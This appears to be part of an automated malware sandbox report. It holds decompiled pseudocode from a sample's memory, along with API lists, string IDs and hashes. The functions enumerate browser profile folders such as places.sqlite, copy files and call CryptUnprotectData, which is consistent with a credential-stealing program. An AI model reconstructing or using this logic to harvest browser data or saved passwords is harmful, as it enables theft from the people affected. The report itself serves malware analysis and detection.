    E00403DB8( &_v620, L"\\*.*", _v8, 0);
    _v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
    do {
        _push(_v8);
        _push(0x4132a0);
        E00403D10( &_v628, 0x104,  &(_v616.cFileName));
        _push(_v628);
        _push(0x4132a0);
        E0040813C(0x1f,  &_v632);
        _push(_v632);
        E00403E1C();
        if(E004076B0(_v624, _t106, 0x104) != 0) {
            _push(_t140);
            _push(0x4131ea);
            _push( *[fs:eax]);
             *[fs:eax] = _t141;
            _push(_v8);
            _push(0x4132a0);
            E00403D10( &_v648, 0x104,  &(_v616.cFileName));
            _push(_v648);
            _push(L"\\places.sqlite");
            E00403E1C();
            E0041256C(_v644, _t106,  &_v640, _t137, _t138);
            E0040377C( &_v636, _v640);
            _push(_v636);
            _push(_v16);
            _push(0x4132a0);
            _push(_v12);
            _push(E004132CC);
            E00403D10( &_v660, 0x104,  &(_v616.cFileName));
            _push(_v660);
            _push(L".txt");
            E00403E1C();
            E0040377C( &_v652, _v656);
            _pop(_t103);
            E0040DCE8(_t103, _t106, _v652, _t137, _t138);
            _pop(_t136);
             *[fs:eax] = _t136;
        }
    } while (FindNextFileW(_v24,  &_v616) != 0);
    FindClose(_v24);
    _pop(_t123);
     *[fs:eax] = _t123;
    _push(E0041327D);
    E00403B98( &_v660, 2);
    E004034E4( &_v652);
    E00403B98( &_v648, 3);
    E004034E4( &_v636);
    E00403B98( &_v632, 4);
    return E00403B98( &_v16, 3);
}

























                                                                                                                                                                                          0x00413238
                                                                                                                                                                                          0x00413248
                                                                                                                                                                                          0x00413253
                                                                                                                                                                                          0x00413263
                                                                                                                                                                                          0x00413275

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00413276,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,00413E3A,00000000,00000000), ref: 004130A8
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                          • String ID: .txt$\*.*$\places.sqlite
                                                                                                                                                                                          • API String ID: 1974802433-3919338718
                                                                                                                                                                                          • Opcode ID: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
                                                                                                                                                                                          • Instruction ID: 8aac54383f65123cc0eb0a4bac2364391818e056087fcce0e0ee32974804bc60
                                                                                                                                                                                          • Opcode Fuzzy Hash: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
                                                                                                                                                                                          • Instruction Fuzzy Hash: CB513A74904119ABDF10EF61CC45BCDBBB9EF44305F6081FAA508B3291DA39AF858F18
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 42%
                                                                                                                                                                                          			E004111C4(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                          				struct _WIN32_FIND_DATAW _v616;
                                                                                                                                                                                          				char _v620;
                                                                                                                                                                                          				intOrPtr _v624;
                                                                                                                                                                                          				char _v628;
                                                                                                                                                                                          				char _v632;
                                                                                                                                                                                          				char _v636;
                                                                                                                                                                                          				char _v640;
                                                                                                                                                                                          				char _v644;
                                                                                                                                                                                          				char _v648;
                                                                                                                                                                                          				char _v652;
                                                                                                                                                                                          				char _v656;
                                                                                                                                                                                          				intOrPtr _v660;
                                                                                                                                                                                          				char _v664;
                                                                                                                                                                                          				char _v668;
                                                                                                                                                                                          				char _v672;
                                                                                                                                                                                          				char _v676;
                                                                                                                                                                                          				char _v680;
                                                                                                                                                                                          				char _v684;
                                                                                                                                                                                          				char _v688;
                                                                                                                                                                                          				intOrPtr _v692;
                                                                                                                                                                                          				char _v696;
                                                                                                                                                                                          				void* _t143;
                                                                                                                                                                                          				void* _t160;
                                                                                                                                                                                          				intOrPtr _t164;
                                                                                                                                                                                          				intOrPtr _t181;
                                                                                                                                                                                          				intOrPtr _t188;
                                                                                                                                                                                          				intOrPtr _t210;
                                                                                                                                                                                          				intOrPtr _t211;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t208 = __esi;
                                                                                                                                                                                          				_t207 = __edi;
                                                                                                                                                                                          				_t162 = __ebx;
                                                                                                                                                                                          				_t210 = _t211;
                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                          				_t164 = 0x56;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t164 = _t164 - 1;
                                                                                                                                                                                          				} while (_t164 != 0);
                                                                                                                                                                                          				_t1 =  &_v8;
                                                                                                                                                                                          				 *_t1 = _t164;
                                                                                                                                                                                          				_push(__ebx);
                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                          				_push(__edi);
                                                                                                                                                                                          				_v16 =  *_t1;
                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                          				_v8 = __eax;
                                                                                                                                                                                          				E004040F4( &_v8);
                                                                                                                                                                                          				E004040F4( &_v12);
                                                                                                                                                                                          				E004040F4( &_v16);
                                                                                                                                                                                          				_push(_t210);
                                                                                                                                                                                          				_push(0x411542);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t211;
                                                                                                                                                                                          				E00403DB8( &_v620, L"\\*.*", _v8, 0);
                                                                                                                                                                                          				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(_v8);
                                                                                                                                                                                          					_push(0x41156c);
                                                                                                                                                                                          					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                          					_push(_v628);
                                                                                                                                                                                          					_push(0x41156c);
                                                                                                                                                                                          					E0040813C(0x61,  &_v632);
                                                                                                                                                                                          					_push(_v632);
                                                                                                                                                                                          					E00403E1C();
                                                                                                                                                                                          					if(E004076B0(_v624, _t162, 0x104) != 0) {
                                                                                                                                                                                          						_push(_t210);
                                                                                                                                                                                          						_push(0x411480);
                                                                                                                                                                                          						_push( *[fs:eax]);
                                                                                                                                                                                          						 *[fs:eax] = _t211;
                                                                                                                                                                                          						if(_a4 == 0) {
                                                                                                                                                                                          							_push(_v8);
                                                                                                                                                                                          							_push(0x41156c);
                                                                                                                                                                                          							E00403D10( &_v648, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                          							_push(_v648);
                                                                                                                                                                                          							_push(0x41156c);
                                                                                                                                                                                          							E0040813C(0x61,  &_v652);
                                                                                                                                                                                          							_push(_v652);
                                                                                                                                                                                          							E00403E1C();
                                                                                                                                                                                          							E00410BB8(_v644, _t162,  &_v640, _t207, _t208);
                                                                                                                                                                                          							E0040377C( &_v636, _v640);
                                                                                                                                                                                          							_push(_v636);
                                                                                                                                                                                          							_push(_v16);
                                                                                                                                                                                          							_push(0x41156c);
                                                                                                                                                                                          							_push(_v12);
                                                                                                                                                                                          							_push(E00411574);
                                                                                                                                                                                          							E00403D10( &_v664, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                          							_push(_v664);
                                                                                                                                                                                          							_push(L".txt");
                                                                                                                                                                                          							E00403E1C();
                                                                                                                                                                                          							E0040377C( &_v656, _v660);
                                                                                                                                                                                          							_pop(_t160);
                                                                                                                                                                                          							E0040DCE8(_t160, _t162, _v656, _t207, _t208);
                                                                                                                                                                                          						}
                                                                                                                                                                                          						if(_a4 == 0) {
                                                                                                                                                                                          							_push(_v8);
                                                                                                                                                                                          							_push(0x41156c);
                                                                                                                                                                                          							E00403D10( &_v680, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                          							_push(_v680);
                                                                                                                                                                                          							_push(0x41156c);
                                                                                                                                                                                          							E0040813C(0x61,  &_v684);
                                                                                                                                                                                          							_push(_v684);
                                                                                                                                                                                          							E00403E1C();
                                                                                                                                                                                          							E00410E70(_v676, _t162,  &_v672, _t207, _t208);
                                                                                                                                                                                          							E0040377C( &_v668, _v672);
                                                                                                                                                                                          							_push(_v668);
                                                                                                                                                                                          							_push(_v16);
                                                                                                                                                                                          							_push(0x41156c);
                                                                                                                                                                                          							_push(_v12);
                                                                                                                                                                                          							_push(E00411574);
                                                                                                                                                                                          							E00403D10( &_v696, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                          							_push(_v696);
                                                                                                                                                                                          							_push(E00411574);
                                                                                                                                                                                          							_push(E0041158C);
                                                                                                                                                                                          							_push(E0041158C);
                                                                                                                                                                                          							_push(L".txt");
                                                                                                                                                                                          							E00403E1C();
                                                                                                                                                                                          							E0040377C( &_v688, _v692);
                                                                                                                                                                                          							_pop(_t143);
                                                                                                                                                                                          							E0040DCE8(_t143, _t162, _v688, _t207, _t208);
                                                                                                                                                                                          						}
                                                                                                                                                                                          						_pop(_t188);
                                                                                                                                                                                          						 *[fs:eax] = _t188;
                                                                                                                                                                                          					}
                                                                                                                                                                                          				} while (FindNextFileW(_v24,  &_v616) != 0);
                                                                                                                                                                                          				FindClose(_v24);
                                                                                                                                                                                          				_pop(_t181);
                                                                                                                                                                                          				 *[fs:eax] = _t181;
                                                                                                                                                                                          				_push(E0041154C);
                                                                                                                                                                                          				E00403B98( &_v696, 2);
                                                                                                                                                                                          				E004034E4( &_v688);
                                                                                                                                                                                          				E00403B98( &_v684, 4);
                                                                                                                                                                                          				E004034E4( &_v668);
                                                                                                                                                                                          				E00403B98( &_v664, 2);
                                                                                                                                                                                          				E004034E4( &_v656);
                                                                                                                                                                                          				E00403B98( &_v652, 4);
                                                                                                                                                                                          				E004034E4( &_v636);
                                                                                                                                                                                          				E00403B98( &_v632, 4);
                                                                                                                                                                                          				return E00403B98( &_v16, 3);
                                                                                                                                                                                          			}




































                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,004118A0,00000000,00000000,00412524), ref: 0041122F
                                                                                                                                                                                            • Part of subcall function 00410E70: GetTickCount.KERNEL32 ref: 00410EB4
                                                                                                                                                                                            • Part of subcall function 00410E70: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                                                                                                                                          • FindNextFileW.KERNEL32(?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000), ref: 00411495
                                                                                                                                                                                          • FindClose.KERNEL32(?,?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000), ref: 004114A6
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFind$CloseCopyCountFirstFreeNextStringTick
                                                                                                                                                                                          • String ID: .txt$\*.*
                                                                                                                                                                                          • API String ID: 4269597168-2615687548
                                                                                                                                                                                          • Opcode ID: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
                                                                                                                                                                                          • Instruction ID: 6859e3562032d776fa84e591ecfbf3afacee5e694faebf3c1d1cda20f45b7b98
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C810C7490021DABDF10EB51CC85BCDB77AEF84304F6041E6A608B62A2DB799F858F58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 46%
                                                                                                                                                                                          			E0041158C(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                          				intOrPtr _v117;
                                                                                                                                                                                          				struct _WIN32_FIND_DATAW _v616;
                                                                                                                                                                                          				char _v620;
                                                                                                                                                                                          				intOrPtr _v624;
                                                                                                                                                                                          				char _v628;
                                                                                                                                                                                          				char _v632;
                                                                                                                                                                                          				char _v636;
                                                                                                                                                                                          				char _v640;
                                                                                                                                                                                          				char _v644;
                                                                                                                                                                                          				char _v648;
                                                                                                                                                                                          				char _v652;
                                                                                                                                                                                          				char _v656;
                                                                                                                                                                                          				intOrPtr _v660;
                                                                                                                                                                                          				char _v664;
                                                                                                                                                                                          				void* _t109;
                                                                                                                                                                                          				void* _t113;
                                                                                                                                                                                          				intOrPtr _t115;
                                                                                                                                                                                          				intOrPtr _t130;
                                                                                                                                                                                          				intOrPtr _t144;
                                                                                                                                                                                          				intOrPtr _t148;
                                                                                                                                                                                          				intOrPtr _t149;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t146 = __esi;
                                                                                                                                                                                          				_t145 = __edi;
                                                                                                                                                                                          				_t113 = __ebx + 1;
                                                                                                                                                                                          				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
                                                                                                                                                                                          				_v117 = _v117 + __edx;
                                                                                                                                                                                          				_t148 = _t149;
                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                          				_t115 = 0x52;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t115 = _t115 - 1;
                                                                                                                                                                                          				} while (_t115 != 0);
                                                                                                                                                                                          				_t3 =  &_v8;
                                                                                                                                                                                          				 *_t3 = _t115;
                                                                                                                                                                                          				_push(_t113);
                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                          				_push(__edi);
                                                                                                                                                                                          				_v16 =  *_t3;
                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                          				_v8 = __eax;
                                                                                                                                                                                          				E004040F4( &_v8);
                                                                                                                                                                                          				E004040F4( &_v12);
                                                                                                                                                                                          				E004040F4( &_v16);
                                                                                                                                                                                          				_push(_t148);
                                                                                                                                                                                          				_push(0x4117df);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t149;
                                                                                                                                                                                          				E00403DB8( &_v620, L"\\*.*", _v8, 0);
                                                                                                                                                                                          				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(_v8);
                                                                                                                                                                                          					_push(0x411808);
                                                                                                                                                                                          					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                          					_push(_v628);
                                                                                                                                                                                          					_push(0x411808);
                                                                                                                                                                                          					E0040813C(0x1f,  &_v632);
                                                                                                                                                                                          					_push(_v632);
                                                                                                                                                                                          					E00403E1C();
                                                                                                                                                                                          					if(E004076B0(_v624, _t113, 0x104) != 0) {
                                                                                                                                                                                          						_push(_t148);
                                                                                                                                                                                          						_push(0x411753);
                                                                                                                                                                                          						_push( *[fs:eax]);
                                                                                                                                                                                          						 *[fs:eax] = _t149;
                                                                                                                                                                                          						_push(_v8);
                                                                                                                                                                                          						_push(0x411808);
                                                                                                                                                                                          						E00403D10( &_v648, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                          						_push(_v648);
                                                                                                                                                                                          						_push(0x411808);
                                                                                                                                                                                          						E0040813C(0x1f,  &_v652);
                                                                                                                                                                                          						_push(_v652);
                                                                                                                                                                                          						E00403E1C();
                                                                                                                                                                                          						E00410900(_v644, _t113,  &_v640, _t145, _t146);
                                                                                                                                                                                          						E0040377C( &_v636, _v640);
                                                                                                                                                                                          						_push(_v636);
                                                                                                                                                                                          						_push(_v16);
                                                                                                                                                                                          						_push(0x411808);
                                                                                                                                                                                          						_push(_v12);
                                                                                                                                                                                          						_push(E00411810);
                                                                                                                                                                                          						E00403D10( &_v664, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                          						_push(_v664);
                                                                                                                                                                                          						_push(L".txt");
                                                                                                                                                                                          						E00403E1C();
                                                                                                                                                                                          						E0040377C( &_v656, _v660);
                                                                                                                                                                                          						_pop(_t109);
                                                                                                                                                                                          						E0040DCE8(_t109, _t113, _v656, _t145, _t146);
                                                                                                                                                                                          						_pop(_t144);
                                                                                                                                                                                          						 *[fs:eax] = _t144;
                                                                                                                                                                                          					}
                                                                                                                                                                                          				} while (FindNextFileW(_v24,  &_v616) != 0);
                                                                                                                                                                                          				FindClose(_v24);
                                                                                                                                                                                          				_pop(_t130);
                                                                                                                                                                                          				 *[fs:eax] = _t130;
                                                                                                                                                                                          				_push(E004117E6);
                                                                                                                                                                                          				E00403B98( &_v664, 2);
                                                                                                                                                                                          				E004034E4( &_v656);
                                                                                                                                                                                          				E00403B98( &_v652, 4);
                                                                                                                                                                                          				E004034E4( &_v636);
                                                                                                                                                                                          				E00403B98( &_v632, 4);
                                                                                                                                                                                          				return E00403B98( &_v16, 3);
                                                                                                                                                                                          			}




























                                                                                                                                                                                          0x004116ea
                                                                                                                                                                                          0x004116eb
                                                                                                                                                                                          0x004116ee
                                                                                                                                                                                          0x004116f3
                                                                                                                                                                                          0x004116f6
                                                                                                                                                                                          0x0041170c
                                                                                                                                                                                          0x00411711
                                                                                                                                                                                          0x00411717
                                                                                                                                                                                          0x00411727
                                                                                                                                                                                          0x00411738
                                                                                                                                                                                          0x00411743
                                                                                                                                                                                          0x00411744
                                                                                                                                                                                          0x0041174b
                                                                                                                                                                                          0x0041174e
                                                                                                                                                                                          0x0041174e
                                                                                                                                                                                          0x0041176d
                                                                                                                                                                                          0x00411779
                                                                                                                                                                                          0x00411780
                                                                                                                                                                                          0x00411783
                                                                                                                                                                                          0x00411786
                                                                                                                                                                                          0x00411796
                                                                                                                                                                                          0x004117a1
                                                                                                                                                                                          0x004117b1
                                                                                                                                                                                          0x004117bc
                                                                                                                                                                                          0x004117cc
                                                                                                                                                                                          0x004117de

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
                                                                                                                                                                                          • FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
                                                                                                                                                                                          • FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$File$CloseFirstFreeNextString
                                                                                                                                                                                          • String ID: .txt$\*.*
                                                                                                                                                                                          • API String ID: 2008072091-2615687548
                                                                                                                                                                                          • Opcode ID: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
                                                                                                                                                                                          • Instruction ID: cb1fa36ef6bd00d28df09069f3f2ad3b15c2d413a197645ac6dab8893c9dac73
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D514C7490411DABDF10EB61CC45BDDB779EF45304F2085FAA608B22A2DA389F858F18
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 45%
                                                                                                                                                                                          			E00411590(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                          				struct _WIN32_FIND_DATAW _v616;
                                                                                                                                                                                          				char _v620;
                                                                                                                                                                                          				intOrPtr _v624;
                                                                                                                                                                                          				char _v628;
                                                                                                                                                                                          				char _v632;
                                                                                                                                                                                          				char _v636;
                                                                                                                                                                                          				char _v640;
                                                                                                                                                                                          				char _v644;
                                                                                                                                                                                          				char _v648;
                                                                                                                                                                                          				char _v652;
                                                                                                                                                                                          				char _v656;
                                                                                                                                                                                          				intOrPtr _v660;
                                                                                                                                                                                          				char _v664;
                                                                                                                                                                                          				void* _t107;
                                                                                                                                                                                          				intOrPtr _t112;
                                                                                                                                                                                          				intOrPtr _t127;
                                                                                                                                                                                          				intOrPtr _t141;
                                                                                                                                                                                          				intOrPtr _t145;
                                                                                                                                                                                          				intOrPtr _t146;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t143 = __esi;
                                                                                                                                                                                          				_t142 = __edi;
                                                                                                                                                                                          				_t110 = __ebx;
                                                                                                                                                                                          				_t145 = _t146;
                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                          				_t112 = 0x52;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t112 = _t112 - 1;
                                                                                                                                                                                          				} while (_t112 != 0);
                                                                                                                                                                                          				_t1 =  &_v8;
                                                                                                                                                                                          				 *_t1 = _t112;
                                                                                                                                                                                          				_push(__ebx);
                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                          				_push(__edi);
                                                                                                                                                                                          				_v16 =  *_t1;
                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                          				_v8 = __eax;
                                                                                                                                                                                          				E004040F4( &_v8);
                                                                                                                                                                                          				E004040F4( &_v12);
                                                                                                                                                                                          				E004040F4( &_v16);
                                                                                                                                                                                          				_push(_t145);
                                                                                                                                                                                          				_push(0x4117df);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t146;
                                                                                                                                                                                          				E00403DB8( &_v620, L"\\*.*", _v8, 0);
                                                                                                                                                                                          				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(_v8);
                                                                                                                                                                                          					_push(0x411808);
                                                                                                                                                                                          					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                          					_push(_v628);
                                                                                                                                                                                          					_push(0x411808);
                                                                                                                                                                                          					E0040813C(0x1f,  &_v632);
                                                                                                                                                                                          					_push(_v632);
                                                                                                                                                                                          					E00403E1C();
                                                                                                                                                                                          					if(E004076B0(_v624, _t110, 0x104) != 0) {
                                                                                                                                                                                          						_push(_t145);
                                                                                                                                                                                          						_push(0x411753);
                                                                                                                                                                                          						_push( *[fs:eax]);
                                                                                                                                                                                          						 *[fs:eax] = _t146;
                                                                                                                                                                                          						_push(_v8);
                                                                                                                                                                                          						_push(0x411808);
                                                                                                                                                                                          						E00403D10( &_v648, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                          						_push(_v648);
                                                                                                                                                                                          						_push(0x411808);
                                                                                                                                                                                          						E0040813C(0x1f,  &_v652);
                                                                                                                                                                                          						_push(_v652);
                                                                                                                                                                                          						E00403E1C();
                                                                                                                                                                                          						E00410900(_v644, _t110,  &_v640, _t142, _t143);
                                                                                                                                                                                          						E0040377C( &_v636, _v640);
                                                                                                                                                                                          						_push(_v636);
                                                                                                                                                                                          						_push(_v16);
                                                                                                                                                                                          						_push(0x411808);
                                                                                                                                                                                          						_push(_v12);
                                                                                                                                                                                          						_push(E00411810);
                                                                                                                                                                                          						E00403D10( &_v664, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                          						_push(_v664);
                                                                                                                                                                                          						_push(L".txt");
                                                                                                                                                                                          						E00403E1C();
                                                                                                                                                                                          						E0040377C( &_v656, _v660);
                                                                                                                                                                                          						_pop(_t107);
                                                                                                                                                                                          						E0040DCE8(_t107, _t110, _v656, _t142, _t143);
                                                                                                                                                                                          						_pop(_t141);
                                                                                                                                                                                          						 *[fs:eax] = _t141;
                                                                                                                                                                                          					}
                                                                                                                                                                                          				} while (FindNextFileW(_v24,  &_v616) != 0);
                                                                                                                                                                                          				FindClose(_v24);
                                                                                                                                                                                          				_pop(_t127);
                                                                                                                                                                                          				 *[fs:eax] = _t127;
                                                                                                                                                                                          				_push(E004117E6);
                                                                                                                                                                                          				E00403B98( &_v664, 2);
                                                                                                                                                                                          				E004034E4( &_v656);
                                                                                                                                                                                          				E00403B98( &_v652, 4);
                                                                                                                                                                                          				E004034E4( &_v636);
                                                                                                                                                                                          				E00403B98( &_v632, 4);
                                                                                                                                                                                          				return E00403B98( &_v16, 3);
                                                                                                                                                                                          			}



























                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
                                                                                                                                                                                          • FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
                                                                                                                                                                                          • FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$File$CloseFirstFreeNextString
                                                                                                                                                                                          • String ID: .txt$\*.*
                                                                                                                                                                                          • API String ID: 2008072091-2615687548
                                                                                                                                                                                          • Opcode ID: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
                                                                                                                                                                                          • Instruction ID: 05cc79d86d1b55c995a7b8d44de261c7f11cdb27113bd27bc9f6ce20252d4423
                                                                                                                                                                                          • Opcode Fuzzy Hash: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
                                                                                                                                                                                          • Instruction Fuzzy Hash: C3514C7490411DABDF50EB61CC45BCDB779EF44304F6085FAA608B32A2DA399F858F58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 16%
                                                                                                                                                                                          			E004094C4(intOrPtr __eax, void* __ecx, char __edx) {
                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				void* _v36;
                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t19 = __ecx;
                                                                                                                                                                                          				_v20 = __edx;
                                                                                                                                                                                          				_v16 = __eax;
                                                                                                                                                                                          				_push( &_v12);
                                                                                                                                                                                          				_push(1);
                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                          				_push( &_v20);
                                                                                                                                                                                          				if( *0x41c7c8() == 0) {
                                                                                                                                                                                          					return E00403538(__ecx, E0040952C);
                                                                                                                                                                                          				}
                                                                                                                                                                                          				E004036DC(__ecx, _v36);
                                                                                                                                                                                          				E00403AC0(_t19, _v40);
                                                                                                                                                                                          				return LocalFree(_v36);
                                                                                                                                                                                          			}









                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 004094E5
                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 0040950A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CryptDataFreeLocalUnprotect
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1561624719-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                          			E00404B4C(int __eax, void* __ebx, void* __eflags) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				char _v15;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				intOrPtr _t29;
                                                                                                                                                                                          				void* _t32;
                                                                                                                                                                                          
                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                          				_push(_t32);
                                                                                                                                                                                          				_push(0x404bb2);
                                                                                                                                                                                          				_push( *[fs:edx]);
